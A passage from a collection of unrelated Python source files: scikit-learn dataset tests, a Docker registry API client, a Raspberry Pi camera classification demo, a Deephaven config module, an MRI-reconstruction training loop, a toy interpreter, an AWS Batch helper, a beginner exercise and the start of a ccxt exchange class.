sample_weight64 = np.arange(y64.size, dtype=np.float64)
X32 = iris.data.astype(np.float32)
y32 = iris.target.astype(np.float32)
X_csr32 = sp.csr_matrix(X32)
sample_weight32 = np.arange(y32.size, dtype=np.float32)
def assert_csr_equal_values(current, expected):
current.eliminate_zeros()
expected.eliminate_zeros()
expected = expected.astype(current.dtype)
assert current.shape[0] == expected.shape[0]
assert current.shape[1] == expected.shape[1]
assert_array_equal(current.data, expected.data)
assert_array_equal(current.indices, expected.indices)
assert_array_equal(current.indptr, expected.indptr)
def make_dense_dataset_32():
return ArrayDataset32(X32, y32, sample_weight32, seed=42)
def make_dense_dataset_64():
return ArrayDataset64(X64, y64, sample_weight64, seed=42)
def make_sparse_dataset_32():
return CSRDataset32(X_csr32.data, X_csr32.indptr, X_csr32.indices, y32,
sample_weight32, seed=42)
def make_sparse_dataset_64():
return CSRDataset64(X_csr64.data, X_csr64.indptr, X_csr64.indices, y64,
sample_weight64, seed=42)
@pytest.mark.parametrize('dataset_constructor', [
make_dense_dataset_32,
make_dense_dataset_64,
make_sparse_dataset_32,
make_sparse_dataset_64,
])
def test_seq_dataset_basic_iteration(dataset_constructor):
NUMBER_OF_RUNS = 5
dataset = dataset_constructor()
for _ in range(NUMBER_OF_RUNS):
# next sample
xi_, yi, swi, idx = dataset._next_py()
xi = sp.csr_matrix((xi_), shape=(1, X64.shape[1]))
assert_csr_equal_values(xi, X_csr64[idx])
assert yi == y64[idx]
assert swi == sample_weight64[idx]
# random sample
xi_, yi, swi, idx = dataset._random_py()
xi = sp.csr_matrix((xi_), shape=(1, X64.shape[1]))
assert_csr_equal_values(xi, X_csr64[idx])
assert yi == y64[idx]
assert swi == sample_weight64[idx]
@pytest.mark.parametrize('make_dense_dataset,make_sparse_dataset', [
(make_dense_dataset_32, make_sparse_dataset_32),
(make_dense_dataset_64, make_sparse_dataset_64),
])
def test_seq_dataset_shuffle(make_dense_dataset, make_sparse_dataset):
dense_dataset, sparse_dataset = make_dense_dataset(), make_sparse_dataset()
# not shuffled
for i in range(5):
_, _, _, idx1 = dense_dataset._next_py()
_, _, _, idx2 = sparse_dataset._next_py()
assert idx1 == i
assert idx2 == i
for i in [132, 50, 9, 18, 58]:
_, _, _, idx1 = dense_dataset._random_py()
_, _, _, idx2 = sparse_dataset._random_py()
assert idx1 == i
assert idx2 == i
seed = 77
dense_dataset._shuffle_py(seed)
sparse_dataset._shuffle_py(seed)
idx_next = [63, 91, 148, 87, 29]
idx_shuffle = [137, 125, 56, 121, 127]
for i, j in zip(idx_next, idx_shuffle):
_, _, _, idx1 = dense_dataset._next_py()
_, _, _, idx2 = sparse_dataset._next_py()
assert idx1 == i
assert idx2 == i
_, _, _, idx1 = dense_dataset._random_py()
_, _, _, idx2 = sparse_dataset._random_py()
assert idx1 == j
assert idx2 == j
@pytest.mark.parametrize('make_dataset_32,make_dataset_64', [
(make_dense_dataset_32, make_dense_dataset_64),
(make_sparse_dataset_32, make_sparse_dataset_64),
])
def test_fused_types_consistency(make_dataset_32, make_dataset_64):
dataset_32, dataset_64 = make_dataset_32(), make_dataset_64()
NUMBER_OF_RUNS = 5
for _ in range(NUMBER_OF_RUNS):
# next sample
(xi_data32, _, _), yi32, _, _ = dataset_32._next_py()
(xi_data64, _, _), yi64, _, _ = dataset_64._next_py()
assert xi_data32.dtype == np.float32
assert xi_data64.dtype == np.float64
assert_allclose(xi_data64, xi_data32, rtol=1e-5)
assert_allclose(yi64, yi32, rtol=1e-5)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# bug-report: feilengcui008@gmail.com
""" api for docker registry """
import urllib2
import urllib
import json
import base64
class RegistryException(Exception):
""" registry api related exception """
pass
class RegistryApi(object):
""" interact with docker registry and harbor """
def __init__(self, username, password, registry_endpoint):
self.username = username
self.password = password
self.basic_token = base64.encodestring("%s:%s" % (str(username), str(password)))[0:-1]
self.registry_endpoint = registry_endpoint.rstrip('/')
#print("%s/v2/_catalog" % (self.registry_endpoint,))
auth = self.pingRegistry("%s/v2/_catalog" % (self.registry_endpoint,))
if auth is None:
raise RegistryException("get token realm and service failed")
self.token_endpoint = auth[0]
self.service = auth[1]
def pingRegistry(self, registry_endpoint):
""" ping v2 registry and get realm and service """
headers = dict()
try:
res = urllib2.urlopen(registry_endpoint)
except urllib2.HTTPError as e:
headers = e.hdrs.dict
try:
(realm, service, _) = headers['www-authenticate'].split(',')
return (realm[14:-1:], service[9:-1])
except Exception as e:
return None
def getBearerTokenForScope(self, scope):
""" get bearer token from harbor """
payload = urllib.urlencode({'service': self.service, 'scope': scope})
url = "%s?%s" % (self.token_endpoint, payload)
req = urllib2.Request(url)
req.add_header('Authorization', 'Basic %s' % (self.basic_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())["token"]
except Exception as e:
return None
def getRepositoryList(self, n=None):
""" get repository list """
scope = "registry:catalog:*"
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/_catalog" % (self.registry_endpoint,)
if n is not None:
url = "%s?n=%s" % (url, str(n))
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getTagList(self, repository):
""" get tag list for repository """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/tags/list" % (self.registry_endpoint, repository)
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getManifest(self, repository, reference="latest", v1=False):
""" get manifest for tag or digest """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def existManifest(self, repository, reference, v1=False):
""" check to see it manifest exist """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("manifestExist failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'HEAD'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return (True, response.headers.dict["docker-content-digest"])
except Exception as e:
return (False, None)
def deleteManifest(self, repository, reference):
""" delete manifest by tag """
(is_exist, digest) = self.existManifest(repository, reference)
if not is_exist:
raise RegistryException("manifest not exist")
scope = "repository:%s:pull,push" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("delete manifest failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, digest)
req = urllib2.Request(url)
req.get_method = lambda: 'DELETE'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
urllib2.urlopen(req)
except Exception as e:
return False
return True
def getManifestWithConf(self, repository, reference="latest"):
""" get manifest for tag or digest """
manifest = self.getManifest(repository, reference)
if manifest is None:
raise RegistryException("manifest for %s %s not exist" % (repository, reference))
config_digest = manifest["config"]["digest"]
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/blobs/%s" % (self.registry_endpoint, repository, config_digest)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
try:
response = urllib2.urlopen(req)
manifest["configContent"] = json.loads(response.read())
return manifest
except Exception as e:
return None
|
#!/usr/bin/env python3
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Camera image classification demo code.
Runs continuous image classification on camera frames and prints detected object
classes.
Example:
image_classification_camera.py --num_frames 10
"""
import argparse
import contextlib
from aiy.vision.inference import CameraInference
from aiy.vision.models import image_classification
from picamera import PiCamera
def classes_info(classes):
return ', '.join('%s (%.2f)' % pair for pair in classes)
@contextlib.contextmanager
def CameraPreview(camera, enabled):
if enabled:
camera.start_preview()
try:
yield
finally:
if enabled:
camera.stop_preview()
def main():
parser = argparse.ArgumentParser('Image classification camera inference example.')
parser.add_argument('--num_frames', '-n', type=int, default=None,
help='Sets the number of frames to run for, otherwise runs forever.')
parser.add_argument('--num_objects', '-c', type=int, default=3,
help='Sets the number of object interences to print.')
parser.add_argument('--nopreview', dest='preview', action='store_false', default=True,
help='Enable camera preview')
args = parser.parse_args()
with PiCamera(sensor_mode=4, framerate=30) as camera, \
CameraPreview(camera, enabled=args.preview), \
CameraInference(image_classification.model()) as inference:
for result in inference.run(args.num_frames):
classes = image_classification.get_classes(result, top_k=args.num_objects)
print(classes_info(classes))
if classes:
camera.annotate_text = '%s (%.2f)' % classes[0]
if __name__ == '__main__':
main()
|
#
# Copyright (c) 2016-2021 Deephaven Data Labs and Patent Pending
#
""" This module provides access to the Deephaven server configuration. """
import jpy
from deephaven import DHError
from deephaven.time import TimeZone
_JDHConfig = jpy.get_type("io.deephaven.configuration.Configuration")
_JDateTimeZone = jpy.get_type("org.joda.time.DateTimeZone")
def get_log_dir() -> str:
""" Returns the server's log directory. """
try:
return _JDHConfig.getInstance().getLogDir()
except Exception as e:
raise DHError(e, "failed to get the server's log directory.") from e
def get_server_timezone() -> TimeZone:
""" Returns the server's time zone. """
try:
j_timezone = _JDateTimeZone.forTimeZone(_JDHConfig.getInstance().getServerTimezone())
for tz in TimeZone:
if j_timezone == tz.value.getTimeZone():
return tz
raise NotImplementedError("can't find the time zone in the TImeZone Enum.")
except Exception as e:
raise DHError(e, message=f"failed to find a recognized time zone") from e
|
import torch
from torch import nn, optim, multiprocessing
from torch.utils.data import DataLoader
from torch.utils.tensorboard.writer import SummaryWriter
from tqdm import tqdm
from time import time
from collections import defaultdict
from utils.run_utils import get_logger
from utils.train_utils import CheckpointManager, make_k_grid, make_img_grid, make_rss_slice, standardize_image
from data.data_transforms import complex_abs
from metrics.new_1d_ssim import SSIM
from metrics.custom_losses import psnr, nmse
# Send this somewhere else soon...
def get_class_name(obj):
return 'None' if obj is None else str(obj.__class__).split("'")[1]
class ModelTrainerIMG:
"""
Model trainer for real-valued image domain losses.
This model trainer can accept k-space an semi-k-space, regardless of weighting.
Both complex and real-valued image domain losses can be calculated.
"""
def __init__(self, args, model, optimizer, train_loader, val_loader, input_train_transform, input_val_transform,
output_train_transform, output_val_transform, losses, scheduler=None):
# Allow multiple processes to access tensors on GPU. Add checking for multiple continuous runs.
if multiprocessing.get_start_method(allow_none=True) is None:
multiprocessing.set_start_method(method='spawn')
self.logger = get_logger(name=__name__, save_file=args.log_path / args.run_name)
# Checking whether inputs are correct.
assert isinstance(model, nn.Module), '`model` must be a Pytorch Module.'
assert isinstance(optimizer, optim.Optimizer), '`optimizer` must be a Pytorch Optimizer.'
assert isinstance(train_loader, DataLoader) and isinstance(val_loader, DataLoader), \
'`train_loader` and `val_loader` must be Pytorch DataLoader objects.'
assert callable(input_train_transform) and callable(input_val_transform), \
'input_transforms must be callable functions.'
# I think this would be best practice.
assert isinstance(output_train_transform, nn.Module) and isinstance(output_val_transform, nn.Module), \
'`output_train_transform` and `output_val_transform` must be Pytorch Modules.'
# 'losses' is expected to be a dictionary.
# Even composite losses should be a single loss module with a tuple as its output.
losses = nn.ModuleDict(losses)
if scheduler is not None:
if isinstance(scheduler, optim.lr_scheduler.ReduceLROnPlateau):
self.metric_scheduler = True
elif isinstance(scheduler, optim.lr_scheduler._LRScheduler):
self.metric_scheduler = False
else:
raise TypeError('`scheduler` must be a Pytorch Learning Rate Scheduler.')
# Display interval of 0 means no display of validation images on TensorBoard.
if args.max_images <= 0:
self.display_interval = 0
else:
self.display_interval = int(len(val_loader.dataset) // (args.max_images * args.batch_size))
self.manager = CheckpointManager(model, optimizer, mode='min', save_best_only=args.save_best_only,
ckpt_dir=args.ckpt_path, max_to_keep=args.max_to_keep)
# loading from checkpoint if specified.
if vars(args).get('prev_model_ckpt'):
self.manager.load(load_dir=args.prev_model_ckpt, load_optimizer=False)
self.model = model
self.optimizer = optimizer
self.train_loader = train_loader
self.val_loader = val_loader
self.input_train_transform = input_train_transform
self.input_val_transform = input_val_transform
self.output_train_transform = output_train_transform
self.output_val_transform = output_val_transform
self.losses = losses
self.scheduler = scheduler
self.writer = SummaryWriter(str(args.log_path))
self.verbose = args.verbose
self.num_epochs = args.num_epochs
self.smoothing_factor = args.smoothing_factor
self.shrink_scale = args.shrink_scale
self.use_slice_metrics = args.use_slice_metrics
# This part should get SSIM, not 1 - SSIM.
self.ssim = SSIM(filter_size=7).to(device=args.device) # Needed to cache the kernel.
# Logging all components of the Model Trainer.
# Train and Val input and output transforms are assumed to use the same input transform class.
self.logger.info(f'''
Summary of Model Trainer Components:
Model: {get_class_name(model)}.
Optimizer: {get_class_name(optimizer)}.
Input Transforms: {get_class_name(input_val_transform)}.
Output Transform: {get_class_name(output_val_transform)}.
Image Domain Loss: {get_class_name(losses['img_loss'])}.
Learning-Rate Scheduler: {get_class_name(scheduler)}.
''') # This part has parts different for IMG and CMG losses!!
def train_model(self):
tic_tic = time()
self.logger.info('Beginning Training Loop.')
for epoch in range(1, self.num_epochs + 1): # 1 based indexing of epochs.
tic = time() # Training
train_epoch_loss, train_epoch_metrics = self._train_epoch(epoch=epoch)
toc = int(time() - tic)
self._log_epoch_outputs(epoch, train_epoch_loss, train_epoch_metrics, elapsed_secs=toc, training=True)
tic = time() # Validation
val_epoch_loss, val_epoch_metrics = self._val_epoch(epoch=epoch)
toc = int(time() - tic)
self._log_epoch_outputs(epoch, val_epoch_loss, val_epoch_metrics, elapsed_secs=toc, training=False)
self.manager.save(metric=val_epoch_loss, verbose=True)
if self.scheduler is not None:
if self.metric_scheduler: # If the scheduler is a metric based scheduler, include metrics.
self.scheduler.step(metrics=val_epoch_loss)
else:
self.scheduler.step()
self.writer.close() # Flushes remaining data to TensorBoard.
toc_toc = int(time() - tic_tic)
self.logger.info(f'Finishing Training Loop. Total elapsed time: '
f'{toc_toc // 3600} hr {(toc_toc // 60) % 60} min {toc_toc % 60} sec.')
def _train_epoch(self, epoch):
self.model.train()
torch.autograd.set_grad_enabled(True)
epoch_loss = list() # Appending values to list due to numerical underflow and NaN values.
epoch_metrics = defaultdict(list)
data_loader = enumerate(self.train_loader, start=1)
if not self.verbose: # tqdm has to be on the outermost iterator to function properly.
data_loader = tqdm(data_loader, total=len(self.train_loader.dataset)) # Should divide by batch size.
for step, data in data_loader:
# Data pre-processing is expected to have gradient calculations removed inside already.
inputs, targets, extra_params = self.input_train_transform(*data)
# 'recons' is a dictionary containing k-space, complex image, and real image reconstructions.
recons, step_loss, step_metrics = self._train_step(inputs, targets, extra_params)
epoch_loss.append(step_loss.detach()) # Perhaps not elegant, but underflow makes this necessary.
# Gradients are not calculated so as to boost speed and remove weird errors.
with torch.no_grad(): # Update epoch loss and metrics
if self.use_slice_metrics:
slice_metrics = self._get_slice_metrics(recons, targets, extra_params)
step_metrics.update(slice_metrics)
[epoch_metrics[key].append(value.detach()) for key, value in step_metrics.items()]
if self.verbose:
self._log_step_outputs(epoch, step, step_loss, step_metrics, training=True)
# Converted to scalar and dict with scalar values respectively.
return self._get_epoch_outputs(epoch, epoch_loss, epoch_metrics, training=True)
def _train_step(self, inputs, targets, extra_params):
self.optimizer.zero_grad()
outputs = self.model(inputs)
recons = self.output_train_transform(outputs, targets, extra_params)
step_loss, step_metrics = self._step(recons, targets, extra_params)
step_loss.backward()
self.optimizer.step()
return recons, step_loss, step_metrics
def _val_epoch(self, epoch):
self.model.eval()
torch.autograd.set_grad_enabled(False)
epoch_loss = list()
epoch_metrics = defaultdict(list)
# 1 based indexing for steps.
data_loader = enumerate(self.val_loader, start=1)
if not self.verbose:
data_loader = tqdm(data_loader, total=len(self.val_loader.dataset))
for step, data in data_loader:
inputs, targets, extra_params = self.input_val_transform(*data)
recons, step_loss, step_metrics = self._val_step(inputs, targets, extra_params)
epoch_loss.append(step_loss.detach())
if self.use_slice_metrics:
slice_metrics = self._get_slice_metrics(recons, targets, extra_params)
step_metrics.update(slice_metrics)
[epoch_metrics[key].append(value.detach()) for key, value in step_metrics.items()]
if self.verbose:
self._log_step_outputs(epoch, step, step_loss, step_metrics, training=False)
# Visualize images on TensorBoard.
self._visualize_images(recons, targets, extra_params, epoch, step, training=False)
# Converted to scalar and dict with scalar values respectively.
return self._get_epoch_outputs(epoch, epoch_loss, epoch_metrics, training=False)
def _val_step(self, inputs, targets, extra_params):
outputs = self.model(inputs)
recons = self.output_val_transform(outputs, targets, extra_params)
step_loss, step_metrics = self._step(recons, targets, extra_params)
return recons, step_loss, step_metrics
def _step(self, recons, targets, extra_params):
step_loss = self.losses['img_loss'](recons['img_recons'], targets['img_targets'])
# If img_loss is a tuple, it is expected to contain all its component losses as a dict in its second element.
step_metrics = dict()
if isinstance(step_loss, tuple):
step_loss, step_metrics = step_loss
acc = extra_params["acceleration"]
if step_metrics: # This has to be checked before anything is added to step_metrics.
for key, value in step_metrics.items():
step_metrics[f'acc_{acc}_{key}'] = value
step_metrics[f'acc_{acc}_loss'] = step_loss
return step_loss, step_metrics
def _visualize_images(self, recons, targets, extra_params, epoch, step, training=False):
mode = 'Training' if training else 'Validation'
# This numbering scheme seems to have issues for certain numbers.
# Please check cases when there is no remainder.
if self.display_interval and (step % self.display_interval == 0):
img_recon_grid = make_img_grid(recons['img_recons'], self.shrink_scale)
# The delta image is obtained by subtracting at the complex image, not the real valued image.
delta_image = complex_abs(targets['cmg_targets'] - recons['cmg_recons'])
delta_img_grid = make_img_grid(delta_image, self.shrink_scale)
acc = extra_params['acceleration']
kwargs = dict(global_step=epoch, dataformats='HW')
self.writer.add_image(f'{mode} Image Recons/{acc}/{step}', img_recon_grid, **kwargs)
self.writer.add_image(f'{mode} Delta Image/{acc}/{step}', delta_img_grid, **kwargs)
if 'kspace_recons' in recons:
kspace_recon_grid = make_k_grid(recons['kspace_recons'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} k-space Recons/{acc}/{step}', kspace_recon_grid, **kwargs)
# Adding RSS images of reconstructions and targets.
if 'rss_recons' in recons:
recon_rss = standardize_image(recons['rss_recons'])
delta_rss = standardize_image(make_rss_slice(delta_image))
self.writer.add_image(f'{mode} RSS Recons/{acc}/{step}', recon_rss, **kwargs)
self.writer.add_image(f'{mode} RSS Delta/{acc}/{step}', delta_rss, **kwargs)
if 'semi_kspace_recons' in recons:
semi_kspace_recon_grid = make_k_grid(
recons['semi_kspace_recons'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} semi-k-space Recons/{acc}/{step}', semi_kspace_recon_grid, **kwargs)
if epoch == 1: # Maybe add input images too later on.
img_target_grid = make_img_grid(targets['img_targets'], self.shrink_scale)
self.writer.add_image(f'{mode} Image Targets/{acc}/{step}', img_target_grid, **kwargs)
if 'kspace_targets' in targets:
kspace_target_grid = \
make_k_grid(targets['kspace_targets'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} k-space Targets/{acc}/{step}', kspace_target_grid, **kwargs)
if 'img_inputs' in targets:
# Not actually the input but what the input looks like as an image.
img_grid = make_img_grid(targets['img_inputs'], self.shrink_scale)
self.writer.add_image(f'{mode} Inputs as Images/{acc}/{step}', img_grid, **kwargs)
if 'rss_targets' in targets:
target_rss = standardize_image(targets['rss_targets'])
self.writer.add_image(f'{mode} RSS Targets/{acc}/{step}', target_rss, **kwargs)
if 'semi_kspace_targets' in targets:
semi_kspace_target_grid = make_k_grid(
targets['semi_kspace_targets'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} semi-k-space Targets/{acc}/{step}',
semi_kspace_target_grid, **kwargs)
def _get_slice_metrics(self, recons, targets, extra_params):
img_recons = recons['img_recons'].detach() # Just in case.
img_targets = targets['img_targets'].detach()
max_range = img_targets.max() - img_targets.min()
slice_ssim = self.ssim(img_recons, img_targets)
slice_psnr = psnr(img_recons, img_targets, data_range=max_range)
slice_nmse = nmse(img_recons, img_targets)
slice_metrics = {'slice/ssim': slice_ssim, 'slice/nmse': slice_nmse, 'slice/psnr': slice_psnr}
if 'rss_recons' in recons:
rss_recons = recons['rss_recons'].detach()
rss_targets = targets['rss_targets'].detach()
max_range = rss_targets.max() - rss_targets.min()
rss_ssim = self.ssim(rss_recons, rss_targets)
rss_psnr = psnr(rss_recons, rss_targets, data_range=max_range)
rss_nmse = nmse(rss_recons, rss_targets)
slice_metrics['rss/ssim'] = rss_ssim
slice_metrics['rss/psnr'] = rss_psnr
slice_metrics['rss/nmse'] = rss_nmse
else:
rss_ssim = rss_psnr = rss_nmse = 0
# Additional metrics for separating between acceleration factors.
if 'acceleration' in extra_params:
acc = extra_params["acceleration"]
slice_metrics[f'slice_acc_{acc}/ssim'] = slice_ssim
slice_metrics[f'slice_acc_{acc}/psnr'] = slice_psnr
slice_metrics[f'slice_acc_{acc}/nmse'] = slice_nmse
if 'rss_recons' in recons:
slice_metrics[f'rss_acc_{acc}/ssim'] = rss_ssim
slice_metrics[f'rss_acc_{acc}/psnr'] = rss_psnr
slice_metrics[f'rss_acc_{acc}/nmse'] = rss_nmse
return slice_metrics
def _get_epoch_outputs(self, epoch, epoch_loss, epoch_metrics, training=True):
mode = 'Training' if training else 'Validation'
num_slices = len(self.train_loader.dataset) if training else len(self.val_loader.dataset)
# Checking for nan values.
epoch_loss = torch.stack(epoch_loss)
is_finite = torch.isfinite(epoch_loss)
num_nans = (is_finite.size(0) - is_finite.sum()).item()
if num_nans > 0:
self.logger.warning(f'Epoch {epoch} {mode}: {num_nans} NaN values present in {num_slices} slices.'
f'Turning on anomaly detection.')
# Turn on anomaly detection for finding where the nan values are.
torch.autograd.set_detect_anomaly(True)
epoch_loss = torch.mean(epoch_loss[is_finite]).item()
else:
epoch_loss = torch.mean(epoch_loss).item()
for key, value in epoch_metrics.items():
epoch_metric = torch.stack(value)
is_finite = torch.isfinite(epoch_metric)
num_nans = (is_finite.size(0) - is_finite.sum()).item()
if num_nans > 0:
self.logger.warning(f'Epoch {epoch} {mode} {key}: {num_nans} NaN values present in {num_slices} slices.'
f'Turning on anomaly detection.')
epoch_metrics[key] = torch.mean(epoch_metric[is_finite]).item()
else:
epoch_metrics[key] = torch.mean(epoch_metric).item()
return epoch_loss, epoch_metrics
def _log_step_outputs(self, epoch, step, step_loss, step_metrics, training=True):
mode = 'Training' if training else 'Validation'
self.logger.info(f'Epoch {epoch:03d} Step {step:03d} {mode} loss: {step_loss.item():.4e}')
for key, value in step_metrics.items():
self.logger.info(f'Epoch {epoch:03d} Step {step:03d}: {mode} {key}: {value.item():.4e}')
def _log_epoch_outputs(self, epoch, epoch_loss, epoch_metrics, elapsed_secs, training=True):
mode = 'Training' if training else 'Validation'
self.logger.info(f'Epoch {epoch:03d} {mode}. loss: {epoch_loss:.4e}, '
f'Time: {elapsed_secs // 60} min {elapsed_secs % 60} sec')
self.writer.add_scalar(f'{mode} epoch_loss', scalar_value=epoch_loss, global_step=epoch)
for key, value in epoch_metrics.items():
self.logger.info(f'Epoch {epoch:03d} {mode}. {key}: {value:.4e}')
# Very important whether it is mode_~~ or mode/~~.
if 'loss' in key:
self.writer.add_scalar(f'{mode}/epoch_{key}', scalar_value=value, global_step=epoch)
else:
self.writer.add_scalar(f'{mode}_epoch_{key}', scalar_value=value, global_step=epoch)
if not training: # Record learning rate.
for idx, group in enumerate(self.optimizer.param_groups, start=1):
self.writer.add_scalar(f'learning_rate_{idx}', group['lr'], global_step=epoch)
|
from nodes import *
from tokens import Token, TokenType
class Interpreter:
def __init__(self, ast):
self.ast = ast
def eval(self):
return self.evalHelper(self.ast)
def evalHelper(self, ast):
if isinstance(ast, NumberNode):
return ast.node
elif isinstance(ast, AddNode):
return self.evalHelper(ast.node_a) + self.evalHelper(ast.node_b)
elif isinstance(ast, SubtractNode):
return self.evalHelper(ast.node_a) - self.evalHelper(ast.node_b)
elif isinstance(ast, MultiplyNode):
return self.evalHelper(ast.node_a) * self.evalHelper(ast.node_b)
elif isinstance(ast, DivideNode):
eval_b = self.evalHelper(ast.node_b)
if eval_b == 0:
raise ZeroDivisionError("Cannot divide by zero")
return self.evalHelper(ast.node_a) / eval_b
elif isinstance(ast, ModuloNode):
eval_b = self.evalHelper(ast.node_b)
if eval_b == 0:
raise ZeroDivisionError("Cannot divide by zero")
return self.evalHelper(ast.node_a) % eval_b
elif isinstance(ast, PowerNode):
return self.evalHelper(ast.node_a) ** self.evalHelper(ast.node_b)
elif isinstance(ast, PositiveNode):
return self.evalHelper(ast.node)
elif isinstance(ast, NegativeNode):
return -self.evalHelper(ast.node)
def postfix_eval(tokens):
stack = []
for t in tokens:
if t.type == TokenType.PLUS:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, a + b))
elif t.type == TokenType.MINUS:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, b - a))
elif t.type == TokenType.MULTIPLY:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, a * b))
elif t.type == TokenType.DIVIDE:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, b / a))
elif t.type == TokenType.MODULO:
print(stack)
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, b % a))
elif t.type == TokenType.POWER:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, b ** a))
else:
stack.append(t)
return stack[0].value
|
import hashlib
import json
import os
import boto3
from .retry import retry_on_aws_too_many_requests
batch = boto3.client('batch')
class JobDefinition:
@classmethod
def clear_all(cls):
deleted_count = 0
for jobdef in batch.describe_job_definitions(status='ACTIVE')['jobDefinitions']:
cls(metadata=jobdef).delete()
deleted_count += 1
return deleted_count
def __init__(self, docker_image=None, deployment=None, arn=None, metadata=None):
self.deployment = deployment if deployment else os.environ['DEPLOYMENT_STAGE']
if not docker_image and not metadata:
raise RuntimeError("you must provide docker_image or metadata")
self.metadata = metadata
self.docker_image = docker_image if docker_image else metadata['containerProperties']['image']
self.name = self._job_definition_name() if docker_image else metadata['jobDefinitionName']
if not arn:
if metadata:
self.arn = metadata['jobDefinitionArn']
print(f"Job definition {self.name} for {self.docker_image}:")
def find_or_create(self, job_role_arn):
if self.load():
print(f"\tfound {self.arn}")
else:
self.create(job_role_arn)
return self
def load(self):
jobdefs = self._describe_job_definitions(jobDefinitionName=self.name, status='ACTIVE')['jobDefinitions']
if len(jobdefs) > 0:
self.metadata = jobdefs[0]
self.arn = self.metadata['jobDefinitionArn']
return self
else:
return None
@retry_on_aws_too_many_requests
def create(self, job_role_arn):
self.metadata = batch.register_job_definition(
jobDefinitionName=self.name,
type='container',
parameters={},
containerProperties={
'image': self.docker_image,
'vcpus': 4,
'memory': 15000,
'command': [],
'jobRoleArn': job_role_arn,
'volumes': [
{
'host': {'sourcePath': '/data'},
'name': 'data'
},
],
'mountPoints': [
{
'containerPath': '/data',
'readOnly': False,
'sourceVolume': 'data'
},
]
},
retryStrategy={
'attempts': 3
}
)
self.arn = self.metadata['jobDefinitionArn']
print(f"\tcreated {self.arn}")
print(json.dumps(self.metadata, indent=4))
def delete(self):
print(f"Deleting job definition {self.name} ({self.docker_image})")
batch.deregister_job_definition(jobDefinition=self.arn)
@retry_on_aws_too_many_requests
def _describe_job_definitions(self, *args, **kwargs):
return batch.describe_job_definitions(*args, **kwargs)
def _job_definition_name(self):
"""
We create Job Definitions for each unique docker image we are given.
As there is no way to search for job definitions wih a particular Docker image,
we must put the Docker image name in the job definition name (the only thing we can search on).
We hash the image name as it will contain characters that aren't allowed in a job definition name.
"""
hasher = hashlib.sha1()
hasher.update(bytes(self.docker_image, 'utf8'))
return f"upload-{self.deployment}-{hasher.hexdigest()}"
|
n = int(input())
total_sum = 0
for i in range(1,n+1):
letter = input()
total_sum += ord(letter)
print(f"The sum equals: {total_sum}")
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.precise import Precise
class wazirx(Exchange):
def describe(self):
return self.deep_extend(super(wazirx, self).describe(), {
'id': 'wazirx',
'name': 'WazirX',
'countries': ['IN'],
'version': 'v2',
'rateLimit': 100,
'has': {
'cancelAllOrders': True,
'cancelOrder': True,
'CORS': False,
'createOrder': True,
'fetchCurrencies': False,
